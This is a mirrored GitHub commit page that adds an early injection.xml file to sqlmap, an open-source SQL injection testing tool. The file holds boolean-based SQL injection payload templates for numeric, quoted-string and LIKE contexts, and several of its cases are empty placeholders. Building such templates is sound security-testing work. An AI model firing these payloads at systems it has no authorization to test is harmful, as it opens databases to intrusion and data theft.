mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-02-16 19:40:37 +03:00
new file
This commit is contained in:
parent
adf2231edb
commit
d9d0c971fa
29
xml/injection.xml
Normal file
29
xml/injection.xml
Normal file
|
@ -0,0 +1,29 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
|
||||
<root>
|
||||
<case tag="custom" desc="custom">
|
||||
<positive format="%s%s%s AND %s%d=%d %s" params="value, prefix, ")" * parenthesis, "(" * parenthesis, randInt, randInt, postfix"/>
|
||||
<negative format="%s%s%s AND %s%d=%d %s" params="value, prefix, ")" * parenthesis, "(" * parenthesis, randInt, randInt + 1, postfix"/>
|
||||
</case>
|
||||
<case tag="numeric" desc="unescaped numeric">
|
||||
<positive format="%s%s AND %s%d=%d" params="value, ")" * parenthesis, "(" * parenthesis, randInt, randInt"/>
|
||||
<negative format="%s%s AND %s%d=%d" params="value, ")" * parenthesis, "(" * parenthesis, randInt, randInt + 1"/>
|
||||
</case>
|
||||
<case tag="stringsingle" desc="single quoted string">
|
||||
<positive format="%s'%s AND %s'%s'='%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr"/>
|
||||
<negative format="%s'%s AND %s'%s'='%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)"/>
|
||||
</case>
|
||||
<case tag="likesingle" desc="LIKE single quoted string">
|
||||
<positive format="%s'%s AND %s'%s' LIKE '%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr"/>
|
||||
<negative format="" params=""/>
|
||||
</case>
|
||||
<case tag="custom" desc="custom">
|
||||
<positive format="" params=""/>
|
||||
<negative format="" params=""/>
|
||||
</case>
|
||||
<case tag="custom" desc="custom">
|
||||
<positive format="" params=""/>
|
||||
<negative format="" params=""/>
|
||||
</case>
|
||||
|
||||
</root>
|
Loading…
Reference in New Issue
Block a user